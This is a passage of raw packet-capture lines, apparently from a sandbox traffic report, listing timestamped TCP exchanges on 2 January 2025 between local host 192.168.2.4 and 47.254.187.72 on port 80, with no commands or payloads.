                                                                            Jan 2, 2025 20:35:00.439929008 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.439930916 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:00.439940929 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.439945936 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:00.439953089 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.439960957 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:00.439965010 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.439974070 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.440242052 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:00.440565109 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.440576077 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.440586090 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.440644979 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:00.440644979 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:00.519928932 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.519967079 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.519979954 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.519990921 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.520001888 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.520025015 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:00.520030975 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.520047903 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.520061016 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:00.520080090 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:00.520215988 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.520226955 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.520232916 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.520265102 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.520267963 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:00.520277023 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.520287991 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.520298958 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:00.520328045 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:00.520595074 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.520606995 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.520618916 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.520625114 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.520629883 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:00.520679951 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:00.521255970 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.521266937 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.521282911 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.521294117 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.521302938 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.521313906 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.521316051 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:00.521320105 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.521338940 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:00.521361113 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:00.521460056 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.521471024 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.521481991 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.521492958 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.521507025 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:00.521529913 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:00.521704912 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.521714926 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.521727085 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.521739006 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.521749973 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:00.521773100 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:00.524746895 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.524780989 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.524796963 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.524808884 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.524821043 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.524828911 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:00.524868011 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:00.524930954 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.524943113 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.524952888 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.524970055 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:00.525003910 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:00.525101900 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.525114059 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.525125027 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.525135040 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.525140047 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:00.525146961 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.525171041 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:00.525192976 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:00.525373936 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.525418043 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.525429010 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.525439024 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.525470018 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:00.525501966 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:00.525597095 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.525625944 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.525633097 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:00.525636911 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.525666952 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:00.525708914 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:00.525795937 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.525808096 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.525819063 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.525846958 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:00.525907040 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.525948048 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:00.525996923 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.526007891 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.526017904 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.526034117 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:00.526055098 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.526061058 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:00.526067972 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.526082039 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.526087999 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:00.526091099 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.526118994 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:00.526141882 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:00.526437998 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.526451111 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.526460886 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.526472092 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.526494980 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:00.526511908 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:00.526671886 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.526683092 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.526694059 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.526705027 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.526710033 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:00.526722908 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.526740074 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:00.526765108 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:00.526968956 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.526982069 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.526998997 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.527009010 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.527014017 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:00.527033091 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:00.527041912 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.527074099 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:00.527213097 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.527254105 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:00.527355909 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.527367115 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.527379036 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.527390003 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.527400970 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.527404070 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:00.527412891 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.527425051 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.527431011 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:00.527437925 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.527447939 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:00.527467012 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:00.527491093 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:00.606722116 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.606765985 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.606785059 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.606796026 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.606807947 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.606817007 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.606827974 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.606837988 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.606848955 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.606859922 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.606859922 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:00.606869936 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.606880903 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.606889009 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:00.606894970 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.606905937 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.606918097 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.606940985 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:00.606940985 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:00.606977940 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:00.607065916 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.607078075 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.607084036 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.607093096 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.607105970 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.607144117 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:00.607145071 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:00.607327938 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.607338905 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.607347965 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.607358932 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.607369900 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.607381105 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.607383013 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:00.607383013 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:00.607445002 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:00.607466936 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.607477903 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.607486963 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.607492924 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.607549906 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:00.607549906 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:00.607745886 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.607764959 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.607840061 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.607850075 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.607856035 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.607877970 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:00.607892990 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.607903957 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.607913971 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.607927084 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:00.607927084 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:00.608078003 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.608088970 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.608108044 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.608123064 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:00.608123064 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:00.608123064 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.608134985 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.608145952 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.608155966 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.608166933 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.608172894 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:00.608172894 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:00.608177900 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.608189106 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.608198881 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.608218908 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:00.608218908 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:00.608377934 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.608387947 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.608398914 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:00.608428001 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:00.608436108 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.608448029 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.608458042 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.608468056 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.608582020 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:00.608582020 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:00.611771107 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.611782074 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.611792088 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.611802101 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.611812115 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.611821890 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.611828089 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.611855030 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:00.611855030 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:00.611882925 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.611887932 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:00.611895084 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.611906052 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.611916065 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.611926079 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.611933947 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:00.611937046 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.611949921 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.611958981 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.611970901 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:00.611972094 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:00.611998081 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:00.612154961 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.612165928 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.612171888 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.612214088 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:00.612281084 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.612296104 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.612306118 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.612317085 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.612328053 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.612334967 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:00.612335920 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:00.612339020 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.612351894 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.612385988 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:00.612385988 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:00.612544060 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.612554073 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.612570047 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.612584114 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.612595081 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.612603903 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:00.612603903 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:00.612605095 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.612617016 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.612626076 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.612636089 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.612646103 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.612648964 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:00.612656116 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.612683058 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:00.612683058 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:00.612725973 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:00.612807989 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.612930059 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:00.613118887 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.613236904 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:01.021306992 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:01.148964882 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:01.530543089 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:01.530561924 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:01.530575037 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:01.530586958 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:01.530652046 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:01.530652046 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:01.531394005 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:01.531407118 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:01.531419039 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:01.531435013 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:01.531467915 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:01.531467915 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:01.531514883 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:01.534828901 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:01.534852028 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:01.534862041 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:01.534881115 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:01.534890890 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:01.534889936 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:01.534909964 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:01.534951925 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:01.536593914 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:01.536604881 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:01.536617041 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:01.536628008 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:01.536668062 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:01.536668062 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:01.540096045 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:01.540110111 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:01.540122032 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:01.540133953 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:01.540163994 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:01.540163994 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:01.540177107 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:01.540215969 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:01.540338039 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:01.541986942 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:01.541999102 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:01.542016029 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:01.542026997 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:01.542047024 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:01.542047977 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:01.542072058 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:01.543610096 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:01.543663979 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:01.543674946 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:01.543684959 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:01.543697119 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:01.543708086 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:01.543708086 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:01.543802977 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:01.546953917 CET804974047.254.187.72192.168.2.4
